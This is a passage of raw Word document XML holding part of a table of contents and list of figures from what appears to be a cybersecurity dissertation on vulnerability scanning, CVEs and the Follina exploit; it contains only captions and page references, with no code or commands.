        <w:p w14:paraId="2F55F8D4" w14:textId="27DC5E54" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190766" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 10: APPENDIX 2 – PROJECT PLANNER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190766 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>127</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10379B82" w14:textId="72499F48" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190767" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 10: APPENDIX 3 - ETHICS FORM</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190767 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>128</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4055906F" w14:textId="3F48F8C3" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190768" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 10: APPENDIX 4 - CVE RESULTS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190768 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>138</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72F107F3" w14:textId="2D92D3BC" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="left" w:pos="851"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="23CAFCF9" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D57B480" w14:textId="542ED9E0" w:rsidR="00DF42B8" w:rsidRDefault="001E5910" w:rsidP="00663E33">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc113190688"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>LIST</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="0060608D">
        <w:t xml:space="preserve"> OF FIGURES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="4F281DED" w14:textId="55D01008" w:rsidR="008D7F6F" w:rsidRDefault="008D7F6F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Figure" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc111981726" w:history="1">
        <w:r w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 1: Internet Users from 2012 to 2022 [1]</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981726 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5110F998" w14:textId="75153091"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27" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2: Percentage of organisations compromised by at least one successful attack [4]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981727 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="134416A9" w14:textId="00AE8929"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28" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3: Growth of malware between 2013 and 2022 [11]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981728 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36260E16" w14:textId="598DE789"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29" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 4: Valuable assets and biggest threats [12]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981729 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CF740C6" w14:textId="59493B34"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30" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 5: Project Structure</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981730 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="647CE383" w14:textId="3292F8A8"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31" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 6: CVEs released between 2010 and 2020 [24]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981731 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="263114E6" w14:textId="5BA41F94"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32" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 7: OpenVAS architecture [28]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981732 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43FB7C25" w14:textId="6C0292D2"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33" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8: Microsoft Confirms MSDT is not a security issue [30]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981733 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21D660F3" w14:textId="329E9349"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34" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 9: Components of the Office Document [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981734 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="38520506" w14:textId="761A26BE"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35" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 10: Target External Reference [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981735 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D977A3E" w14:textId="0084D258"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36" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 11: Follina Exploit code [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981736 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="773965CD" w14:textId="72C64659"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37" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 12: Base64 Encoded Data Decoded [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981737 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="70035C09" w14:textId="154EAC70"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38" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 13: The Follina Process [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981738 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BEEBB22" w14:textId="7B287B73"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39" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 14: Minimum Commands for Follina to Run [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc111981739 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="208DD68E" w14:textId="4B879C84"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40" w:history="1">
        <w:r w:rsidR="008D7F6F" w:rsidRPr="00891B29">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 15: Strict Minimum Requirements for Follina to Run [32]</w:t>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008D7F6F">
          <w:rPr>
